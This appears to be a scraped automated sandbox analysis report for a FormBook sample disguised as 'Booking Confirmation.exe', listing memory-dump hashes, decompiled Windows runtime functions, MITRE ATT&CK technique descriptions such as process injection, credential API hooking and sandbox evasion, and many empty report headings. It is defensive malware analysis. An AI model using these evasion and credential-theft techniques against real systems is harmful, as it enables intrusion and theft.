
Memory Dump Source

Source File: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, Offset: 04320000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
Instruction ID: e8302048a2af54e3abb9b1e5fe2f8595f35bc099b007261dbf3c0df3e857633b
Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
Instruction Fuzzy Hash: 97D0A7717903043BF610FBA49C07F2632CD9B54B05F490064FA49D73C3D950F1004165

Uniqueness

Uniqueness Score: -1.00%

Function 04339FF8, Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(04334506,?,04334C7F,04334C7F,?,04334506,?,?,?,?,?,00000000,00000000,?), ref: 0433A05D

Memory Dump Source

Source File: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, Offset: 04320000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 03e9093b74d1a94712e318f7cb5a534fa851ef372762b9642eb02261604237ed
Instruction ID: f1384c36f601cc796611d604a5482ce4174eabade87c39755dd75e09c885a35e
Opcode Fuzzy Hash: 03e9093b74d1a94712e318f7cb5a534fa851ef372762b9642eb02261604237ed
Instruction Fuzzy Hash: F0C08CB1308A218AE224FB64D840877B3AEFBC0241320C91AD58646000823254084660

Uniqueness

Uniqueness Score: -1.00%

Function 04D2967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04D29694

Memory Dump Source

Source File: 00000008.00000002.912945622.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: true

Associated: 00000008.00000002.913120947.0000000004DDB000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.913136262.0000000004DDF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d6b5a8d95c485322c8e73dd1e25933dd5eb81e52a5327029ab623122bf87af32
Instruction ID: 342928bf02a1321acc0101dfed5d8026971eb8e5a7f8ea4872de358f8ce3f308
Opcode Fuzzy Hash: d6b5a8d95c485322c8e73dd1e25933dd5eb81e52a5327029ab623122bf87af32
Instruction Fuzzy Hash: C3B09BB19014D5CDF711D7604708717795177D4747F16C061D1020651A4778D1D5F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04D7FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E04D7FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04D2CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04D75720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04D75720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x04d7fdda
0x04d7fde2
0x04d7fde5
0x04d7fdec
0x04d7fdfa
0x04d7fdff
0x04d7fe0a
0x04d7fe0f
0x04d7fe17
0x04d7fe1e
0x04d7fe19
0x04d7fe19
0x04d7fe19
0x04d7fe20
0x04d7fe21
0x04d7fe22
0x04d7fe25
0x04d7fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04D7FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04D7FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04D7FE01

Memory Dump Source

Source File: 00000008.00000002.912945622.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: true

Associated: 00000008.00000002.913120947.0000000004DDB000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.913136262.0000000004DDF000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: aaa2dd9f5e519df181b82f90a45f0a2d4d7e50e3e5f1adba93115ea9659cd73c
Instruction ID: c648bc9a6df6d19bf72d7e56d8a9229e76a61010572dccb15a0a30ca5cc983e6
Opcode Fuzzy Hash: aaa2dd9f5e519df181b82f90a45f0a2d4d7e50e3e5f1adba93115ea9659cd73c
Instruction Fuzzy Hash: FDF0F632200601BFE6201B55DC02F23BB6AEB84730F140314F628565D1EA62FC2096F5

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Booking Confirmation.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Function 00419DB2, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 74
filenativeCOMMON

Function 00419E0A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39
filenativeCOMMON

Function 00419E10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Function 00419D60, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Function 00419D62, Relevance: 1.5, APIs: 1, Instructions: 39
filenativeCOMMON

Function 00419D1C, Relevance: 1.5, APIs: 1, Instructions: 31
filenativeCOMMON

Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Function 00419E90, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON